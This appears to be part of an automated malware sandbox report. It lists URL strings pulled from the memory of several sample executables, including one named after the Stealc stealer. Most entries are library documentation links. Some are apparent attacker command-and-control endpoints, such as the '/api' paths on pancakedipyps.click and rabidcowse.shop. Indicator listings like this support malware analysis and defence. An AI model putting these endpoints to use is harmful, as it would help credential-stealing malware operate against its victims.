                                  Source: client_jackbastadguy.exe, 00000017.00000003.2787855784.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2784009746.000002103E0F6000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781952523.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E014000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2772329883.000002103E012000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787345849.000002103E0F7000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2783492962.000002103E0EF000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2786220060.000002103D613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765739149.000002103D958000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2781548241.000002103D95A000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2776435894.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764071442.000002103D950000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773693170.000002103D959000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2785963640.000002103D95B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2784431954.000002103D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805888391.000002103E6A0000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2782552772.000002103E19D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                                  Source: liddad.exe, 00000015.00000003.2579414233.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmp, liddad.exe, 00000015.00000003.2579294968.0000000000F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
                                  Source: liddad.exe, 00000015.00000003.2579414233.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, liddad.exe, 00000015.00000003.2579294968.0000000000F36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipC
                                  Source: liddad.exe, 00000015.00000002.2659822914.00000000006DB000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://httpbin.org/ipbefore
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2776999972.000002103E00F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                                  Source: gold1111111111.exe, 00000013.00000003.2549807905.0000000005C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2790443253.000002103DEF0000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803179756.000002103DEF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/
                                  Source: axplong.exe, 00000005.00000002.2993013959.0000000005AB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/EG
                                  Source: axplong.exe, 00000005.00000003.2453828190.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/910997785/34bbe59b-8804
                                  Source: axplong.exe, 00000005.00000003.2494577747.0000000005AD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/910998942/245e975e-0c8d
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000003.2696969753.0000000005AD6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/911427352/1d7d7595-2252
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805468160.000002103E270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802456538.000002103DC60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2777953270.000002103D8B1000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2786608347.000002103D8B2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2788271543.000002103D8C2000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2770927694.000002103D89C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2774502407.000002103D89F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2775297088.000002103D8AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2805468160.000002103E270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
                                  Source: legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2471224699.0000000003C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/
                                  Source: legs.exe, 0000000A.00000003.2523123424.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2560120614.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click//
                                  Source: legs.exe, 0000000A.00000003.2510421518.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click///
                                  Source: legs.exe, 0000000A.00000003.2434050002.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2434306736.0000000003C9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click///m
                                  Source: legs.exe, 0000000A.00000003.2497003981.0000000001393000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/88
                                  Source: legs.exe, 0000000A.00000003.2523123424.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/F9M
                                  Source: legs.exe, legs.exe, 0000000A.00000003.2556541983.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2523123424.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2510235936.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496927102.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.0000000001426000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2560120614.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556843601.0000000001425000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2559951043.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556447078.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.000000000142C000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api
                                  Source: legs.exe, 0000000A.00000003.2510235936.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496927102.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556447078.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.000000000142C000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/api7RydFqE=u
                                  Source: legs.exe, 0000000A.00000003.2556447078.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.000000000142C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apiZ
                                  Source: legs.exe, 0000000A.00000003.2469990881.0000000003C92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apihi39
                                  Source: legs.exe, 0000000A.00000003.2524370072.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apim
                                  Source: legs.exe, 0000000A.00000003.2523123424.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.0000000001416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/apis
                                  Source: legs.exe, 0000000A.00000003.2510235936.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496927102.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.0000000001426000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556843601.0000000001425000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bm
                                  Source: legs.exe, 0000000A.00000003.2523123424.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2560120614.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524814208.0000000001416000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2554435563.0000000001416000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bu
                                  Source: legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/bubztMi
                                  Source: legs.exe, 0000000A.00000003.2510235936.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2496927102.000000000141D000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.0000000001426000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556843601.0000000001425000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/feo
                                  Source: legs.exe, 0000000A.00000002.2560120614.0000000001417000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2556017634.0000000001417000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/piw
                                  Source: legs.exe, 0000000A.00000003.2433827542.0000000003C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click/r
                                  Source: legs.exe, 0000000A.00000003.2556447078.000000000142B000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000002.2561121566.000000000142C000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 0000000A.00000003.2524370072.000000000142B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pancakedipyps.click:443/api
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0685/
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802348249.000002103DB60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2802583057.000002103DD60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/build/).
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/importlib_metadata
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2726511930.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/setuptools/
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2811502404.00007FFDFB9A3000.00000002.00000001.01000000.00000016.sdmpString found in binary or memory: https://python.org/dev/peps/pep-0263/
                                  Source: gold1111111111.exe, 00000013.00000003.2582901089.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2572863396.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2564239143.0000000005C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/
                                  Source: gold1111111111.exe, 00000013.00000003.2565836695.0000000005C25000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2564554975.0000000005C1F000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2571187180.0000000005C25000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2564608879.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2582901089.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2572863396.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2564239143.0000000005C1F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/9
                                  Source: gold1111111111.exe, 00000013.00000003.2622786439.00000000033EF000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622876153.00000000033F6000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624081430.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622240824.000000000339E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/:
                                  Source: gold1111111111.exe, 00000013.00000003.2500252161.000000000339A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/H
                                  Source: gold1111111111.exe, 00000013.00000003.2582249708.0000000003406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/api
                                  Source: gold1111111111.exe, 00000013.00000003.2596971491.0000000003401000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2596783766.0000000003401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/api#i
                                  Source: gold1111111111.exe, 00000013.00000003.2622786439.0000000003409000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624113639.0000000003409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/apiJioq
                                  Source: gold1111111111.exe, 00000013.00000003.2596814803.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624913938.0000000005C38000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622925716.0000000005C38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/apiN
                                  Source: gold1111111111.exe, 00000013.00000003.2546865742.0000000005C1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/apiX
                                  Source: gold1111111111.exe, 00000013.00000002.2623881290.000000000339E000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2622240824.000000000339E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/apio
                                  Source: gold1111111111.exe, 00000013.00000003.2582249708.0000000003406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/p
                                  Source: gold1111111111.exe, 00000013.00000003.2596971491.0000000003401000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2596783766.0000000003401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/pi
                                  Source: gold1111111111.exe, 00000013.00000003.2622786439.0000000003409000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624113639.0000000003409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/pi)tqq=
                                  Source: gold1111111111.exe, 00000013.00000003.2622786439.0000000003409000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624113639.0000000003409000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/qt)q6
                                  Source: gold1111111111.exe, 00000013.00000003.2582249708.0000000003406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/ts
                                  Source: gold1111111111.exe, 00000013.00000003.2622786439.0000000003409000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2596971491.0000000003401000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000002.2624113639.0000000003409000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2596783766.0000000003401000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/ve
                                  Source: gold1111111111.exe, 00000013.00000003.2582249708.0000000003406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop/ve9taq_
                                  Source: gold1111111111.exe, 00000013.00000003.2536146526.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2534708912.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2571143304.0000000003401000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2536627908.0000000005C24000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2536601760.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2534884999.0000000005C26000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2500252161.000000000339A000.00000004.00000020.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2582901089.0000000005C26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rabidcowse.shop:443/api
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2717707562.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
                                  Source: client_jackbastadguy.exe, 00000016.00000003.2725466300.000001FE20955000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/importlib-metadata/badge/?version=latest
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2802251660.000002103DA60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://refspecs.linuxfoundation.org/elf/gabi4
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2806118937.000002103EA8C000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2773846005.000002103DF97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
                                  Source: axplong.exe, 00000005.00000002.2980326735.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, legs.exe, 00000006.00000002.2395960727.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805468160.000002103E270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF14000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF14000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755825443.000002103DF89000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2765497236.000002103DF8D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755548768.000002103DF84000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF6F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2754264393.000002103DF8C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packages0C
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF14000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF14000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2737790289.000002103DF6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr:r;Nr
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2806118937.000002103EA8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sexo.gofile.fun/obtenciondeplaticaxxxxmiakhalifa
                                  Source: client_jackbastadguy.exe, 00000017.00000002.2805577556.000002103E380000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sexo.gofile.fun/obtenciondeplaticaxxxxmiakhalifayd0
                                  Source: client_jackbastadguy.exe, 00000017.00000003.2765070001.000002103DF8F000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2793117132.000002103DF90000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755825443.000002103DF89000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000002.2803382451.000002103DF90000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2755548768.000002103DF84000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2754264393.000002103DF8C000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2764413126.000002103DF7D000.00000004.00000020.00020000.00000000.sdmp, client_jackbastadguy.exe, 00000017.00000003.2787410720.000002103DF90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sexo.gofile.fun/obtenciondeplaticaxxxxmiakhalifaz
                                  Source: legs.exe, 0000000A.00000003.2420888831.0000000003D35000.00000004.00000800.00020000.00000000.sdmp, gold1111111111.exe, 00000013.00000003.2521676676.0000000005C71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                                  Source: gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                  Source: gold1111111111.exe, 00000013.00000003.2549269233.000000000603B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                  Source: stealc_valenciga.exe, 0000000B.00000003.2591268769.0000000009B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
